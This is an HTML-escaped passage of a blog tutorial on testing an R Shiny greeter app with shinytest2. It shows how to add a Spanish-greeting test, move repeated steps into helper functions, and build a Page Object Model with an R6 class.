&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Hola &amp;#34;&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;isolate&lt;/span&gt;(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name), &lt;span style="color:#a5d6ff"&gt;&amp;#34;!&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The first thing to note is that with the change to the app, the first
test still passes. It would have failed had we not restricted our test
to just look at the &lt;code&gt;greeting&lt;/code&gt; variable (for example, if we had used
&lt;code&gt;app$expect_values()&lt;/code&gt; to make a snapshot of all the variables that are
in-play and to take an image of the app).&lt;/p&gt;
&lt;p&gt;We want to add a new test to check the &lt;code&gt;spanish_greeting&lt;/code&gt; as well as the
&lt;code&gt;greeting&lt;/code&gt; variable.&lt;/p&gt;
&lt;p&gt;To add a new test to the app, we could use the {shinytest2} recorder (as
in the previous post), or we could just copy and paste the first test,
and modify the bits we need to. We’ll do the latter.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ./tests/testthat/test-e2e-greeter_accepts_username.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ... snip ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;the greeter app prints a Spanish greeting to the user&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# GIVEN: The app is open&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; shiny_app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinyGreeter&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;run&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinytest2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;AppDriver&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;new&lt;/span&gt;(shiny_app, name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;spanish_greeter&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_window_size&lt;/span&gt;(width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1619&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;970&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# WHEN: the user enters their name and clicks the &amp;#34;Greet&amp;#34; button&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_inputs&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;click&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# THEN: a Spanish greeting is printed to the screen&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_values&lt;/span&gt;(output &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;spanish_greeting&amp;#34;&lt;/span&gt;, screenshot_args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note that we have changed the &lt;code&gt;name&lt;/code&gt; argument to &lt;code&gt;AppDriver$new()&lt;/code&gt;, this
allows us to have multiple test cases in the same script - were the
&lt;code&gt;AppDriver&lt;/code&gt;s for the English- and the Spanish-test both given
&lt;code&gt;name=&amp;quot;greeter&amp;quot;&lt;/code&gt;, the snapshots would both be written to the same file.&lt;/p&gt;
&lt;h2 id="use-functions-to-simplify-and-clarify-your-test-code"&gt;Use functions to simplify and clarify your test code&lt;/h2&gt;
&lt;p&gt;The new test is almost identical to the previous one we wrote. That kind
of duplication should set off alarm bells - more duplication means more
maintenance.&lt;/p&gt;
&lt;p&gt;In R, the simplest way to reduce code duplication is by writing a
function.&lt;/p&gt;
&lt;h3 id="simplify-the-set-up-code"&gt;Simplify the set-up code&lt;/h3&gt;
&lt;p&gt;Let’s add a function to get the app into the pre-test state:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;initialise_test_app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(name) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; shiny_app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinyGreeter&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;run&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinytest2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;AppDriver&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;new&lt;/span&gt;(shiny_app, name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; name)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_window_size&lt;/span&gt;(width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1619&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;970&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With that we can start the test-version of the app using
&lt;code&gt;app = initialise_test_app(&amp;quot;greeter&amp;quot;)&lt;/code&gt; in the first test and
&lt;code&gt;app = initialise_test_app(&amp;quot;spanish_greeter&amp;quot;)&lt;/code&gt; in the second. This
removes a few lines of code, and would make it easier to write new
tests, but the main purpose of doing this is to make the test code more
prominent.&lt;/p&gt;
&lt;p&gt;The Spanish test now looks like:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;the greeter app prints a Spanish greeting to the user&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# GIVEN: The app is open&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;initialise_test_app&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;spanish_greeter&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# WHEN: the user enters their name and clicks the &amp;#34;Greet&amp;#34; button&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_inputs&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;click&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# THEN: a Spanish greeting is printed to the screen&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_values&lt;/span&gt;(output &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;spanish_greeting&amp;#34;&lt;/span&gt;, screenshot_args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="make-the-user-steps-more-descriptive"&gt;Make the user steps more descriptive&lt;/h3&gt;
&lt;p&gt;What’s actually happening when the following code runs?&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_inputs&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;click&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;First we set the value for the &lt;code&gt;input$name&lt;/code&gt; variable to be “Jumping
Rivers” and then we click on a button that has the HTML identifier
“greet”. These are quite ‘internal’ concerns. What’s really happening is
that the user is entering their username into the app (clicking the
button is part of that process).&lt;/p&gt;
&lt;p&gt;This is a really simple app, so it shouldn’t take long to work out what
the above code does here. But in more complicated apps, and when testing
more complicated workflows, the series of steps that define the user
actions can be quite extensive.&lt;/p&gt;
&lt;p&gt;Having well-defined functions that are responsible for the different
steps in a test workflow is really valuable. With these, your non-coding
colleagues will find it easier to follow the connection between what the
code is testing and how the test is defined.&lt;/p&gt;
&lt;p&gt;Even in this simple setting, it might be beneficial to introduce a
function:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;enter_username &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(app, username) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_inputs&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; username)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;click&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# return the app object, so that you can pipe together the actions&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;invisible&lt;/span&gt;(app)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then you can rewrite the test steps:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;the greeter app prints a Spanish greeting to the user&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# GIVEN: The app is open&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;initialise_test_app&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;spanish_greeter&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# WHEN: the user enters their name and clicks the &amp;#34;Greet&amp;#34; button&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;enter_username&lt;/span&gt;(app, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# THEN: a Spanish greeting is printed to the screen&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_values&lt;/span&gt;(output &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;spanish_greeting&amp;#34;&lt;/span&gt;, screenshot_args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Another benefit of introducing functions for commonly repeated parts of
your test actions, relates to refactoring. Suppose the &lt;code&gt;input$name&lt;/code&gt;
variable was renamed in the app. With the initial two tests, to
accommodate the change in this variable name we would have had to touch
two different places in the code - one in the English test and one in
the Spanish test. Now we only have to modify a single line in
&lt;code&gt;enter_username()&lt;/code&gt;. A similar issue happens when decomposing apps into
shiny modules (because the HTML identifiers for different elements will
change with the refactoring).&lt;/p&gt;
&lt;h2 id="make-your-expectations-descriptive-too-"&gt;Make your expectations descriptive too …&lt;/h2&gt;
&lt;p&gt;The snapshot tests used by {shinytest2} are wonderful if you need to
compare many values at once, or you need to do visual comparison of the
contents of your app. But they can make your test cases a bit opaque. In
the above, on entering their username, two welcome messages were printed
to the screen. While each test was running, {shinytest2} compared the
observed value for a given welcome message to a previously stored
value - but that previously stored value is stored a distance from the
place where the test is defined. Hiding the expectations away like this
may make it hard for a new developer to see why the actions performed in
the “WHEN” steps of a test should culminate in the values observed in
the “THEN” step.&lt;/p&gt;
&lt;p&gt;{shinytest2} provides some additional methods that help extract specific
values. With these, you can use the expectation functions from
{testthat} much as you would when unit-testing functions in R.&lt;/p&gt;
&lt;p&gt;For example, we might rewrite the first test like so:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;the greeter app updates user&amp;#39;s name on clicking the button&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# GIVEN: The app is open&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;initialise_test_app&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greeter&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# WHEN: the user enters their name and clicks the &amp;#34;Greet&amp;#34; button&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;enter_username&lt;/span&gt;(app, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# THEN: a greeting is printed to the screen&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; message &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_value&lt;/span&gt;(output &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;greeting&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_equal&lt;/span&gt;(message, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Jumping Rivers!&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The source code for this version of the application can be obtained from
&lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/r-shinytest2/part-3-functions/" rel="external"&gt;github&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="the-page-object-model"&gt;The Page Object Model&lt;/h2&gt;
&lt;p&gt;The functions that were introduced above hid the details of the app away
from us. By using these functions, we don’t need to know which HTML
element or shiny variable we need to interact with or modify when
setting the username.&lt;/p&gt;
&lt;p&gt;A pattern called the &lt;a href="https://martinfowler.com/bliki/PageObject.html" rel="external"&gt;“Page Object Model”
(POM)&lt;/a&gt; takes this idea
of hiding an app’s internal details away from the test author even
further. The POM is common in UI-based end-to-end testing in other
languages. Here, a class is defined that contains methods for
interacting with the app (but does not contain any code to perform test
expectations). The test code calls methods provided by the POM, so that
the test code is more concise and descriptive. A neat way to achieve
this design in R, is by using R6 classes. Here, we might have a class
that has a method for opening the app, and a method &lt;code&gt;enter_username&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;AppDriver&lt;/code&gt; class provided by {shinytest2} is an R6 class. It
provides a lot of methods that we used above (&lt;code&gt;expect_values&lt;/code&gt;,
&lt;code&gt;get_value&lt;/code&gt;) for interacting with the app. So by now, you have some
experience of using an R6 object. We can inherit from the &lt;code&gt;AppDriver&lt;/code&gt;
class to create a POM that is specific for our app as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;GreeterApp &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; R6&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;R6Class&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;GreeterApp&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Alternatively you could pass an AppDriver in at initiation&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; inherit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinytest2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;AppDriver,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; public &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1619&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;970&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; initialize &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(name) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; shiny_app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinyGreeter&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;run&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; super&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;initialize&lt;/span&gt;(shiny_app, name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; name)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; self&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_window_size&lt;/span&gt;(width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; self&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;width, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; self&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;height)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; enter_username &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(username) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; self&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_inputs&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; username)
